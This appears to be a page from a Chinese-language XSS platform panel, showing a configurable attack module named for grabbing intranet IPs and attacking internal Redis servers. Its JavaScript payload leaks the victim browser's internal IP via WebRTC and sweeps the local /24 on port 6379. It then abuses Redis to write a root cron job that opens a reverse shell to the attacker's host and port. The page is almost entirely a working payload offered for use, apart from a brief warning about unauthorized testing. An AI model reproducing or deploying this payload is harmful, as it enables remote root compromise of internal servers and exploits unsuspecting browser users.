存档
那些文章
漏洞预警
圈内新闻
资源分享
设计笔记
吐槽
笔记
关于
留言
友链
计划
读者墙
标签集
面板
更新历史
提交需求
Chatgpt
XSS平台
子站搜索
会员面板
请经常阅读公告和更新日志来快速了解面板的发展情况.
未登录
未激活
面板公告
更新历史
提交需求
需求列表
Chatgpt
XSS 平台
我的模块
公共模块
辅助扩展
短号选择
子站搜索
面板密语
个人设置
消费清单
退出登录
测试之前,请妥善考虑一二,请勿胡乱搞事情,测试未授权网站有风险!
模块名称
自动获取内网ip打内网redis
模块描述
详细说明:http://替换成你的域名/1355.html 参数说明: lhost:你的服务器,用nc监听的ip lport:nc监听的端口 自动获取内网IP,自动打内网255机器
参数
需要服务器接收的参数名
没有配置该参数!
配置参数
使用此模块时需要配置的参数,如参数名为user,则代码引用:{set.user}
["lhost","lport"]
代码
{projectId}为项目id,{set.***}为***配置参数
ipList = []; var webrtcxss = { webrtc : function(callback){ var ip_dups = {}; var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; var mediaConstraints = { optional: [{RtpDataChannels: true}] }; var servers = undefined; if(window.webkitRTCPeerConnection){ servers = {iceServers: []}; } var pc = new RTCPeerConnection(servers, mediaConstraints); pc.onicecandidate = function(ice){ if(ice.candidate){ var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/; var ip_addr = ip_regex.exec(ice.candidate.candidate)[1]; if(ip_dups[ip_addr] === undefined) callback(ip_addr); ip_dups[ip_addr] = true; } }; pc.createDataChannel(""); pc.createOffer(function(result){ pc.setLocalDescription(result, function(){}); }); }, getIp : function(){ this.webrtc(function(ip){ ipList.push(ip); }); } } webrtcxss.getIp() setTimeout(function() { for(var i in ipList) { if(ipList[i]) { var iparr = ipList[i].split("."); for(var i=0;i<255;i++) { var attkip = iparr [0] + "." + iparr [1] + "." + iparr [2] + "." + i; send(attkip); } } } }, 300); function send(ip) { var port= '6379'; var dir = '/var/spool/cron/'; var filename = 'root'; var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/{set.lhost}/{set.lport} 0>&1'; var url = "http://" + ip + ":" + port; var cmd = new XMLHttpRequest(); cmd.open("POST", url); cmd.send('eval '' + 'redis.call("set", "hacked", "\r\n\n'+content+'\n\n\n\n\"); redis.call("config", "set", "dir", "' + dir + '/"); redis.call("config", "set", "dbfilename", "'+filename+'"); ' + '' 0' + "\r\n"); var cmd = new XMLHttpRequest(); cmd.open("POST", url); cmd.send('save\r\n'); }
返回